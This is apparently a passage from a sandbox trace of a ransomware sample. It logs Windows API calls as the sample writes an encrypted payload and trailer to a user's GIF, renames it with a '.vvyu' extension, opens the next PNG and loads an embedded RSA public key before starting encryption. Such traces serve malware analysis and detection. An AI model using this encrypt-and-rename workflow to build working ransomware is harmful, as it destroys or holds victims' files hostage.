Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af37c8 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ff0 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3810 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6008 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6038 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6098 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6050 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.327] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6098 [0191.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0191.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6050 [0191.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6038 [0191.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0191.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0191.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.330] GetCurrentThreadId () returned 0x5d8 [0191.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5a48 [0191.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.331] GetCurrentThreadId () returned 0x5d8 [0191.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6098 [0191.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6038 [0191.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0191.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6050 [0191.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6020 [0191.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60b0 [0191.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0191.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6080 [0191.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6068 [0191.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60c8 [0191.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6068 [0191.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0191.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6038 [0191.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3810 | out: hHeap=0x2c0000) returned 1 [0191.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.342] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x1870a, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x1870a, lpOverlapped=0x0) returned 1 [0191.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0191.344] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1870f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.344] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0191.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.346] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.346] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.346] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.347] CloseHandle (hObject=0x584) returned 1 [0191.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0191.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0191.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0191.349] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\uCbdvMv01ecUQrS5kFhR.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ucbdvmv01ecuqrs5kfhr.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\uCbdvMv01ecUQrS5kFhR.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ucbdvmv01ecuqrs5kfhr.gif.vvyu")) returned 1 [0191.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.351] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0191.354] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3a482b0, ftCreationTime.dwHighDateTime=0x1d89713, ftLastAccessTime.dwLowDateTime=0xff035cb0, ftLastAccessTime.dwHighDateTime=0x1d899f4, ftLastWriteTime.dwLowDateTime=0xff035cb0, ftLastWriteTime.dwHighDateTime=0x1d899f4, nFileSizeHigh=0x0, nFileSizeLow=0x13b88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ujyi1dWdud6-J7Pcelmb.png", cAlternateFileName="UJYI1D~1.PNG")) returned 1 [0191.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3810 [0191.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0191.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3810 | out: hHeap=0x2c0000) returned 1 [0191.354] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\Ujyi1dWdud6-J7Pcelmb.png") returned=".png" [0191.354] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\Ujyi1dWdud6-J7Pcelmb.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ujyi1dwdud6-j7pcelmb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.355] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=80776) returned 1 [0191.355] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.359] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x13b62, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.359] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.362] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.362] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x13b88, lpOverlapped=0x0) returned 1 [0191.363] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.363] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.363] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.363] CryptAcquireContextW (in: phProv=0x2f9fa50, 